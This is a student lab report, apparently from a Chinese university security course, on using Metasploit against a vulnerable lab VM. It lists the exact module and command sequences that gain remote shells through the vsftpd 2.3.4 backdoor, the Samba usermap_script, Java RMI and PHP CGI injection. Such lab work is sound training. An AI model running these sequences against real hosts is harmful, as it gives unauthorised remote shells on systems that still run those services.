首页 > 其他分享 >20222415 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222415 2024-2025-1 《网络与系统攻防技术》实验六实验报告

时间:2024-11-21 10:23:41浏览次数:1  
标签:use 端口 2024 2025 exploit 实验 230.80 20222415 172.16

1.实验内容

本周学习了metasploit的用法并趁热打铁做了一场痛彻心扉实践课。很好的实践题让我下六个虚拟机:)

2.实验过程

靶机 IP 172.16.230.80
主机 IP 172.16.227.205

(1)前期渗透
Search一下,标白的地方就是等下要use的

use auxiliary/scanner/discovery/arp_sweep

然后输入show options看一下要指定哪些内容,可以看到还需要指定RHOSTS,就是要扫描的地址

接下来进行端口扫描,输入
nmap 172.16.230.80

哇,都open了,要是上回实践用的是这个靶机该多好:)
(2)Vsftpd源码包后门漏洞(21端口)
输入use exploit/unix/ftp/vsftpd_234_backdoor进行攻击,payload需要指定RHOSTS和SPORT,端口已经是21了,只需要再指定下目标地址了

set RHOSTS 172.16.230.80
run

接下来可以看到有会话建立了,攻击成功:)

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

use exploit/multi/samba/usermap_script 
set RHOST 172.16.230.80
exploit

利用成功 执行uname–a验证

(4)Java RMI SERVER命令执行漏洞(1099端口)
之前已经使用nmap命令扫到1099端口是开着的了,直接攻击
use exploit/multi/misc/java_rmi_server,再使用show options看一下需要指定什么参数

set RHOST 172.16.230.80
exploit
sessions -i 1
shell


(5)PHP CGI参数执行注入漏洞(80端口)

use exploit/multi/http/php_cgi_arg_injection
set RHOST 172.16.230.80
exploit/run 开始攻击

3.问题及解决方案

由于上次实践把苦都吃完了,这次实验给的靶机也好用,指导书也把指明都给了,因此没碰见啥问题。

4.学习感悟、思考等

我和同学们做实验的时候都感觉这次实验六和上回实践应该反过来,因为这次实验实在是做得很轻松,二十分来分钟就实验连报告给搞定了,不像上回实践作业我连第二个靶机都还没下完。这次实验做起来还特别顺手,因为对metasploit的攻击流程还是比较熟悉了,search-use-show-set-run这一套流程像开自己家门一样熟悉,越做越熟练也是我们实践课的意义吧。

标签:use,端口,2024,2025,exploit,实验,230.80,20222415,172.16
From: https://www.cnblogs.com/2415trq/p/18558483

相关文章

  • 【20241121】Git客户端配置使用和各种命令解析
    gitee的使用文档  1、gitee是什么?基于git的代码托管协助平台2、git网站上的注册登录2.1打开gitee官网Gitee-基于Git的代码托管和研发协作平台打开注册登录即可。邮箱注册最好,非邮箱在个人-设置里添加自己的邮箱。新手请公开自己的邮箱,如图:     3、准......
  • 【2024-11-20】保持轻腹
    20:00因为你能痛苦,就说明你对生活还抱有希望!                                                 ——路遥昨天降温了,但也终于等了到我们小区附近那文化节活动的结束。这......
  • 2024-2025 ICPC, NERC, Southern and Volga Russian Regional Contest B. Make It Equ
    因为和题解有所区别,所以写一发题解增长见识。题面B.MakeItEqual给你一个大小为\(n\)的整数数组\(a\)。数组元素的编号从\(1\)到\(n\)。您可以执行以下任意次数的操作(可能为0次):从\(1\)到\(n\)中选择一个索引\(i\);将\(a_i\)减少\(2\),并将\(a_{(i\bmo......
  • 2024-2025-1 20241320 《计算机基础与程序设计》第九周学习总结
    2024-2025-120241320《计算机基础与程序设计》第九周学习总结作业信息https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP|这个作业属于哪个课程|https://www.cnblogs.com/rocedu/p/9577842.html|这个作业要求在哪里|https://www.cnblogs.com/rocedu/p/9577842.html#......
  • Goby 漏洞发布|超高危!Palo-alto-panos createRemoteAppwebSession.php 命令执行漏洞CVE
    漏洞名称:Palo-alto-panoscreateRemoteAppwebSession.php命令执行漏洞CVE-2024-0012CVE-2024-947EnglishName:Palo-alto-panos/php/utils/createRemoteAppwebSession.phpCommandExecutionVulnerabilityCVE-2024-0012CVE-2024-9474CVSScore:9.5漏洞描述:PaloAltoNet......
  • 20222423 2024-2025-1 《网络与系统攻防技术》实验五实验报告
    1.实验内容1.2实验任务(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式该域名对应IP地址IP地址注册人及联系方式IP地址所在国家、城市和具体地理位置PS:使用whois、dig、nslookup、traceroute、以及各......
  • 学期2024-2025-1 学号20241424 《计算机基础与程序设计》第9周学习总结
    学期2024-2025-1学号20241424《计算机基础与程序设计》第9周学习总结作业信息|这个作业属于2024-2025-1-计算机基础与程序设计||-- |-- ||这个作业要求在2024-2025-1计算机基础与程序设计第九周作业)||这个作业的目标|<参考上面的学习总结模板,把学习过程通过博客(随笔)发表......
  • 佛山市华英学校 CSP-J/S2024 获奖情况总表(公开信息)
    比赛奖项姓名年级学校分数省份性别备注CSP2024入门三等奖程曦初一佛山市华英学校100广东男CSP2024入门三等奖方卓强初一佛山市华英学校110广东男CSP2024提高三等奖方卓强初一佛山市华英学校70广东男CSP2024入门三等奖井晨羽......
  • 2024.11.20 NOIP模拟 - 模拟赛记录
    异或(xor)每次所加三角形的范围如图所示:这道题做法较多,我是通过两组差分与前缀和来做的。首先需要一个三角形差分,使每一次在差分数组中修改时,影响到的范围是一个三角形,比如这样(红色点为\((x,y)\),即\((r,c)\)):假设我们真正需要修改的三角形是橙色部分:那么联系到正常差分,很容......
  • [CSP-S 2024] 染色
    还是决定把这个题做了考场上设计的状态,推了一个小时没推出来下午推了一会,发现这是个刷表状态,填表没法做,转移无处下手但是考CSP的时候我貌似并不知道什么叫刷表设\(f_{i,j,k}\)表示当前到\(i\),上一个填的红色位置在\(j\),蓝色位置在\(k\),暴力刷表转移是3D/0D的,需要排......